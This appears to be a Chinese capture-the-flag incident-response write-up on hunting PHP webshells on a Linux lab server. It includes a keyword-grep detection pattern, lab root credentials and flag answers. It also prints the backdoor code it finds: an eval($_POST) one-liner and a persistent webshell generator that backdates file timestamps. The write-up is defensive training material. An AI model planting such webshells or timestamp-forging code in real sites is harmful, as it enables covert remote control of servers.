【玄机】第一章 应急响应- Linux入侵排查

01 前置知识

在线沙箱：

vt  https://www.virustotal.com
奇安信沙箱 https://sandbox.ti.qianxin.com/sandbox/page
微步云沙箱 https://s.threatbook.com/
安恒云沙箱 https://sandbox.ti.qianxin.com/sandbox/page
360沙箱云 https://ata.360.net/

手工查杀：

在根目录下查找所有后缀为php的文件，-iname意思是不区分大小写
查找其中的恶意关键词
find ./ -type f -iname "*.php" |xargs egrep 'assert|bash|system|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval\(|file_put_contents|base64_decode'

php不死马/内存马原理：

php不死马/内存马是将不死马启动后删除本身，在内存中执行死循环，使管理员无法删除木马文件
介绍文章：
PHP不死马介绍文章

02 题目

账号：root 密码：linuxruqin
ssh root@IP
1.web目录存在木马，请找到木马的密码提交
2.服务器疑似存在不死马，请找到不死马的密码提交
3.不死马是通过哪个文件生成的，请提交文件名
4.黑客留下了木马文件，请找出黑客的服务器ip提交

5.黑客留下了木马文件，请找出黑客服务器开启的监控端口提交

1.web目录存在木马，请找到木马的密码提交

cd /var/www/html

打包web目录到本地，使用d盾，河马在线，或手工查杀的方式锁定木马

下载过程中火绒报毒

使用D盾查杀：

经过查看可以确定，后门文件为 .shell.php 1.php index.php

1.php文件内容为：

<?php eval($_POST[1]);?>

flag{1}

2.服务器疑似存在不死马，请找到不死马的密码提交

根据题目可知存在不死马

如果不了解不死马的可以到前置知识中查看相关文章介绍

一般是由于一个php文件生成另外一个隐藏文件的形式，这里是通过index.php生成了.shell.php文件
index.php中的关键代码

$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);

定义了webshell的生成路径

$file = '/var/www/html/.shell.php';

定义了webshell

$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';

将webshell写入.shell.php文件

file_put_contents($file, $code);

暂停脚本3毫秒

usleep(3000);

当这个index.php文件被请求执行时，会生成.shell.php文件

分析完了不死马，接着提交flag，可以轻易得知不死马的密码是

5d41402abc4b2a76b9719d911017c592

flag{hello}

3.不死马是通过哪个文件生成的，请提交文件名

根据上述不死马的分析可知是由index.php文件生成的

flag{index.php}

4.黑客留下了木马文件，请找出黑客的服务器ip提交

可以在/var/www/html路径下找到一个可疑的elf文件，众所周知，linux中可执行文件后缀就是elf文件，将shell(1).elf文件拿下来，丢到沙箱中分析

微步云沙箱：
安恒云沙箱：可以看到是msf生成的后门，ip为10.11.55.21
flag{10.11.55.21}

5.黑客留下了木马文件，请找出黑客服务器开启的监控端口提交

由安恒沙箱中结果可知，黑客服务器的监控端口是3333

flag{3333}